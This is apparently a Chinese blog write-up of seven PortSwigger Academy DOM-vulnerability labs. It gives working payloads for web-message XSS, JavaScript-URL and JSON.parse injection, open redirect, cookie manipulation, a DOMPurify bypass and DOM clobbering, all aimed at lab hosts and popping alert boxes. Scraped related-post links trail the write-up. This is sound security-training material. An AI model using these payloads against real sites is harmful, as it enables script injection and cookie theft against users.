DOM-based vulnerabilities

材料里没列完,直接做题吧

1 - DOM XSS using web messages

  • 题目描述

    • 这个lab有一个简单的web-message漏洞

  • 要求

    • 利用exploit server给网站发送一个信息,使其执行alert(document.cookie)

  • 解题过程

    • 查看源码,发现如下代码

      window.addEventListener('message', function(e) {
      
	document.getElementById('ads').innerHTML = e.data;
      
})

    • MDN看了下web message,是一个跨源通信的函数,可以通过iframe来实现这个功能

    • 构造exp

      • 先尝试了用iframe+script标签的形式,但是发现script标签不会等iframe加载完,所以放进了iframe
      • postMessage()的第二个参数使用通配符,允许目标站点为任意域(防止CORS被阻止)
      • 关于post进去的数据也进行了尝试(chrome),svg,script都不行,想了一下应该与标签的解析流有关(插入的标签没有被解析),这里用img
      <iframe src="https://ac131fb91f0c536f80f50dc100070028.web-security-academy.net/" onload='this.contentWindow.postMessage("<img src=x onerror=alert(document.cookie)>","*")'>

2 - DOM XSS using web messages and a JavaScript URL

  • 题目描述

    • 此lab存在DOM-based跳转漏洞(通过web message诱发)

  • 要求

    • 构造页面,使访问者执行alert(document.cookie)

  • 解题过程

    • 还是先找代码

      window.addEventListener('message', function(e) {
      
    var url = e.data;
      
    if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {  //传入的url包含http(s):
      
        location.href = url;// 跳转
      
    }
      
}, false);

      • 弹窗可以通过伪javascript伪协议调用

        let url = 'javscript:alert()-"http:"';
        
location.href = url;

// 但是这样不好写进去,因为单双引号(所以需要借助编码环境进行编码,事件内部是js解析环境,会先进行unicode解码,所以可以进行编码
        
this.contentWindow.postMessage('javascript:alert(document.cookie)-"http:"',"*")

    • 构造exp

      <iframe src="https://ac901fa21ee08d748031385e00110021.web-security-academy.net/" onload='this.contentWindow.postMessage('javascript:alert(document.cookie)-"http:"',"*")'>

3 - DOM XSS using web messages and JSON.parse

  • 题目描述

    • 此lab使用了web messageing并把消息当作json解析

  • 要求

    • 构造页面,使访问者执行alert(document.cookie)

  • 解题过程

    • 先看代码

      window.addEventListener('message', function(e) {
      
    var iframe = document.createElement('iframe'), ACMEplayer = {element: iframe}, d;
      
    document.body.appendChild(iframe);
      
    try {
      
        d = JSON.parse(e.data);
      
    } catch(e) {
      
        return;
      
    }
      
    switch(d.type) {
      
        case "page-load":
      
            ACMEplayer.element.scrollIntoView();
      
            break;
      
        case "load-channel":
      
            ACMEplayer.element.src = d.url; // 如果d.type=="load-channel",则讲url赋给iframe
      
            break;
      
        case "player-height-changed":
      
            ACMEplayer.element.style.width = d.width + "px";
      
            ACMEplayer.element.style.height = d.height + "px";
      
            break;
      
    }
      
}, false);

    • 构造exp

      <iframe src="https://ac0b1f8a1e418d0a802e3c2100ea005f.web-security-academy.net/" onload='var a={"type":"load-channel","url":"javascript:alert(document.cookie)"};this.contentWindow.postMessage(JSON.stringify(a),"*")'>
      • 这里需要用JSON.stringify()把json转换成字符串,不能直接传输对象

4 - DOM-based open redirection

  • 题目描述

    • 此lab有一个DOM型的url跳转漏洞

  • 要求

    • 把受害者拐进exploit server

  • 解题过程

    • 点进一个详情页面,发现返回链接比较特殊

      <a href="#" onclick="returnUrl = /url=(https?:\/\/.+)/.exec(location); if(returnUrl)location.href = returnUrl[1];else location.href = '/';">Back to Blog</a>
      • location(地址栏里全部的东西,包括#后面的内容)用正则url=(https?:\/\/.+)匹配,如果能匹配到,就跳转到匹配到的url

    • 构造exp

      • 这块想了半天,把受害者拐进exploit server需要点击按钮,总不能继续xss吧,然后去看了solution,自己就是受害者???
      • 第二个,使用#也可以达到目的,但是不给过,只能用&(猜测后端通过检测url参数判断)
      https://ac891f911e4e7dcb80201fd4009d0060.web-security-academy.net/post?postId=4#url=https://acc61fdf1e577d2480831f0b019e002b.web-security-academy.net

solution: # -> &

5 - DOM-based cookie manipulation

  • 题目描述

    • 此lab存在DOM型客户端cookie修改

  • 要求

    • 插入一个可以实现XSS(弹cookie)的cookie

  • 解题过程

    • 在商品详情页面看到如下代码

      document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'

      可以通过&/#插入内容

    • 在主页,发现在访问过之后,会出现浏览记录,而且会被'逃逸

      <a href="https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/product?productId=1#" -alert()-'="">'&gt;Last viewed product</a>

之前访问的是https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/product?productId=1#'-alert()-'>

    • 构造exp

      <iframe src="https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/product?productId=1#'%3E%3Csvg/onload=alert(document.cookie)%3E" onload="this.src='https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/'">

6 - Exploiting DOM clobbering to enable XSS

  • 题目描述

    • 评论功能点允许安全的HTML

  • 要求

    • 构造HTML注入,污染(clobber)变量?,调用alert()
    • hint:预期解只在chrome有效

  • 解题过程

    • 在详情页面看到函数调用loadComments('/post/comment'),看看函数定义

      function loadComments(postCommentPath) {
      
    let xhr = new XMLHttpRequest();
      
    xhr.onreadystatechange = function() {
      
        if (this.readyState == 4 && this.status == 200) {
      
            let comments = JSON.parse(this.responseText);
      
            displayComments(comments);
      
        }
      
    };
      
    xhr.open("GET", postCommentPath + window.location.search);
      
    xhr.send();

    function escapeHTML(data) {
      
        return data.replace(/[<>'"]/g, function(c){
      
            return '&#' + c.charCodeAt(0) + ';';
      
        })
      
    }

    function displayComments(comments) {
      
        let userComments = document.getElementById("user-comments");

        for (let i = 0; i < comments.length; ++i)
      
        {
      
            comment = comments[i];
      
            let commentSection = document.createElement("section");
      
            commentSection.setAttribute("class", "comment");

            let firstPElement = document.createElement("p");

            let defaultAvatar = window.defaultAvatar || {avatar: '/resources/images/avatarDefault.svg'}
      
            let avatarImgHTML = '<img class="avatar" src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">';

            let divImgContainer = document.createElement("div");
      
            divImgContainer.innerHTML = avatarImgHTML

            if (comment.author) {
      
                if (comment.website) {
      
                    let websiteElement = document.createElement("a");
      
                    websiteElement.setAttribute("id", "author");
      
                    websiteElement.setAttribute("href", comment.website);
      
                    firstPElement.appendChild(websiteElement)
      
                }

                let newInnerHtml = firstPElement.innerHTML + DOMPurify.sanitize(comment.author)
      
                firstPElement.innerHTML = newInnerHtml
      
            }

            if (comment.date) {
      
                let dateObj = new Date(comment.date)
      
                let month = '' + (dateObj.getMonth() + 1);
      
                let day = '' + dateObj.getDate();
      
                let year = dateObj.getFullYear();

                if (month.length < 2)
      
                    month = '0' + month;
      
                if (day.length < 2)
      
                    day = '0' + day;

                dateStr = [day, month, year].join('-');

                let newInnerHtml = firstPElement.innerHTML + " | " + dateStr
      
                firstPElement.innerHTML = newInnerHtml
      
            }

            firstPElement.appendChild(divImgContainer);

            commentSection.appendChild(firstPElement);

            if (comment.body) {
      
                let commentBodyPElement = document.createElement("p");
      
                commentBodyPElement.innerHTML = DOMPurify.sanitize(comment.body);

                commentSection.appendChild(commentBodyPElement);
      
            }
      
            commentSection.appendChild(document.createElement("p"));

            userComments.appendChild(commentSection);
      
        }
      
    }
      
};

    • 挨着看了一遍,感觉29、30行可能存在问题,但是不知道怎么利用

      • 试了一下在提交参数的时候增加avatar,没有用

    • 放着先测一下能用哪些标签

      • a
        
audio
        
b
        
big
        
br
        
button
        
canvas
        
center
        
cite
        
code
        
datalist
        
dfn
        
del
        
details
        
filedset
        
h1
        
hr
        
i
        
input
        
ins
        
kdb
        
label
        
li
        
mark
        
marquee
        
meter
        
optgroup
        
progress
        
q
        
rp
        
s
        
samp
        
select
        
svg
        
textarea
        
u

        • 有点多,挑一个最喜欢的svg测测

        • 然后发现,返回的数据包是没有过滤的,过滤全部在前端的DOMPurify.sanitize()中进行

        • 本以为这条路走不通了,然后在搜这个函数的时候看到一篇Bypass DOMPurify的文章

          <form>
          
<math><mtext>
          
</form><form>
          
<mglyph>
          
<style></math><img src onerror=alert(1)>

    • 回到代码看看

      • 如果能找到给windows.属性赋值的方法(通过html或请求),就可以通过以下代码进行XSS

        let defaultAvatar = window.defaultAvatar || {avatar: '/resources/images/avatarDefault.svg'}
        
let avatarImgHTML = '<img class="avatar" src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">';

      • 去看了下材料DOM clobber 里面介绍了一种方法,

        <script>
        
 window.onload = function(){
        
    let someObject = window.someObject || {};
        
    let script = document.createElement('script');
        
    script.src = someObject.url;
        
    document.body.appendChild(script);
        
 };
        
</script>
        
<!--
        
To exploit this vulnerable code, you could inject the following HTML to clobber the someObject reference with an anchor element:
        
As the two anchors use the same ID, the DOM groups them together in a DOM collection. The DOM clobbering vector then overwrites the someObject reference with this DOM collection. A name attribute is used on the last anchor element in order to clobber the url property of the someObject object, which points to an external script.
        
-->

<!-- 要修改 window.someObject.url  则使id=someObject  name=url  href=目标内容 -->
        
<a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>

      • 测试发现javascript:伪协议被过滤

      • 试试能不能逃逸出字符串,最后还是看了solution,用的&quot;("的html实体编码)

    • 构造exp(调用alert()函数就行了,加document.cookie会被过滤

      <a id=defaultAvatar><a id=defaultAvatar name=avatar href="&quot;onerror=alert()//">

7 - Clobbering DOM attributes to bypass HTML filters

  • 题目描述

    • 此lab使用了HTMLJanitor库,可以通过DOM clobber构造攻击向量bypass过滤器并调用alert(document.cookie)

  • 要求

    • 给受害者发送一个自动执行的攻击向量,alert(document.cookie)
    • intended solution for chrome

  • 解题过程

    • 进详情页面看了看代码,没有上一题的直接引用window.object/document.object,此外,引用了HTMLJanitor库

    • 反复看了几遍HTMLJanitor的代码,没找到突破口在哪里,于是去看了solution + Donx发现的DOM clobber的介绍

      <form id=x tabindex=0 onfocus=alert(document.cookie)><input id=attributes>
      
<!-- 覆盖 使 x.attributes == undefined  -->

<iframe src=https://your-lab-id.web-security-academy.net/post?postId=3 onload="setTimeout(someArgument=>this.src=this.src+'#x',500)">

      • 关键代码

        for (var a = 0; a < node.attributes.length; a += 1) {
        
  var attr = node.attributes[a];

  if (shouldRejectAttr(attr, allowedAttrs, node)) {
        
    node.removeAttribute(attr.name);
        
    // Shift the array to continue looping.
        
    a = a - 1;
        
  }
        
}

// Sanitize children
        
this._sanitize(document, node);

function shouldRejectAttr(attr, allowedAttrs, node) {
        
  var attrName = attr.name.toLowerCase();

  if (allowedAttrs === true) {
        
    return false;
        
  } else if (typeof allowedAttrs[attrName] === "function") {
        
    return !allowedAttrs[attrName](attr.value, node);
        
  } else if (typeof allowedAttrs[attrName] === "undefined") {
        
    return true;
        
  } else if (allowedAttrs[attrName] === false) {
        
    return true;
        
  } else if (typeof allowedAttrs[attrName] === "string") {
        
    return allowedAttrs[attrName] !== attr.value;
        
  }

  return false;
        
}

      • 使用<form id=x tabindex=0 onfocus=alert(document.cookie)><input id=attributes>进行DOM clobber,使得form.attributes == undefined

      • 在检测的代码中可以看到,当node.attributes == undefined时,会绕过removeAttribute(),保留下标签中的事件

    • 之后的iframe标签是用来触发onfocus的,必须等到加载评论的ajax结束

Portswigger web security academy:DOM-based vulnerabilities的更多相关文章

  1. Portswigger web security academy:DOM Based XSS

    Portswigger web security academy:DOM Based XSS 目录 Portswigger web security academy:DOM Based XSS DOM ...

  2. Portswigger web security academy:Clickjacking (UI redressing)

    Portswigger web security academy:Clickjacking (UI redressing) 目录 Portswigger web security academy:Cl ...

  3. Portswigger web security academy:WebSockets

    Portswigger web security academy:WebSockets 目录 Portswigger web security academy:WebSockets Lab: Mani ...

  4. Portswigger web security academy:Stored XSS

    Portswigger web security academy:Stored XSS 目录 Portswigger web security academy:Stored XSS Stored XS ...

  5. Portswigger web security academy:Cross-origin resource sharing (CORS)

    Portswigger web security academy:Cross-origin resource sharing (CORS) 目录 Portswigger web security ac ...

  6. Portswigger web security academy:XML external entity (XXE) injection

    Portswigger web security academy:XML external entity (XXE) injection 目录 Portswigger web security aca ...

  7. Portswigger web security academy:Cross-site request forgery (CSRF)

    Portswigger web security academy:Cross-site request forgery (CSRF) 目录 Portswigger web security acade ...

  8. Portswigger web security academy:OAth authentication vulnerable

    Portswigger web security academy:OAth authentication vulnerable 目录 Portswigger web security academy: ...

  9. Portswigger web security academy:Server-side request forgery (SSRF)

    Portswigger web security academy:Server-side request forgery (SSRF) 目录 Portswigger web security acad ...

  10. Portswigger web security academy:OS command injection

    Portswigger web security academy:OS command injection 目录 Portswigger web security academy:OS command ...

随机推荐

  1. 003-try-catch-finally-return执行顺序问题

    一.try-catch-finally-return执行顺序问题 0.原始执行顺序 try - > finally try -> catch -> finally 1.try cat ...

  2. springMVC @InitBinder注解

    springMVC @InitBinder注解.setFieldDefaultPrefix则可以在表单用如user.name进行传递属性

  3. java mvc 及其缓存

    使用Spring框架的好处是什么? - 轻量:Spring 是轻量的,基本的版本大约2MB. - 控制反转:Spring通过控制反转实现了松散耦合,对象们给出它们的依赖,而不是创建或查找依赖的对象们. ...

  4. CentOS 7 卸载 OpenJDK 安装 OracleJDK

    查看 JDK 安装版本 java -version java version 1.7.0_51 OpenJDK Runtime Environment ( rhel-2.4.5.5.el7-x86_6 ...

  5. Java8的新特性--Optional

    目录 Optional 一.Optional类是什么? 二.Optional类常用的方法 1. 创建Optional实例 1.1 Optional.of(T) 1.2 Optional.empty() ...

  6. Python爬虫系列之爬取美团美食板块商家数据(一)

    主要思路 目的: 根据输入的城市名,爬取该城市美团美食板块所有商家的数据.数据包括: 店名.评分.评论数量.均价.地址, 并将这些数据存入Excel中. 最后尝试对爬取到的数据做一个简单的分析. 克服 ...

  7. [Fundamental of Power Electronics]-PART II-7. 交流等效电路建模-7.3 脉冲宽度调制器建模

    7.3 脉冲宽度调制器建模 我们现在已经达成了本章开始的目标,为图7.1推导了一个有效的等效电路模型.但仍存在一个细节,对脉冲宽度调制(PWM)环节进行建模.如图7.1所示的脉冲宽度调制器可以产生一个 ...

  8. Python基础(八):字符串的使用(下)

    find() 功能:检测字符串是否包含指定字符.如果包含指定字符,则返回开始的索引:否则,返回-1. >>> st = "hello world" >> ...

  9. 详细了解 InnoDB 内存结构及其原理

    最近发现,文章太长的话,包含的信息量较大, 并且需要更多的时间去阅读.而大家看文章,应该都是利用的一些碎片时间.所以我得出一个结论,文章太长不太利于大家的吸收和消化.所以我之后会减少文章的长度,2-3 ...

  10. 北航OO第一单元作业总结(1.1~1.3)

    经过了三次作业之后,OO第一单元告一段落,作为一个蒟蒻,我初步了解了面向对象的编程思想,并将所学内容用于实践. 一.第一次作业 1.架构分析 本次作业需要完成的任务为简单多项式导函数的求解.表达式仅支 ...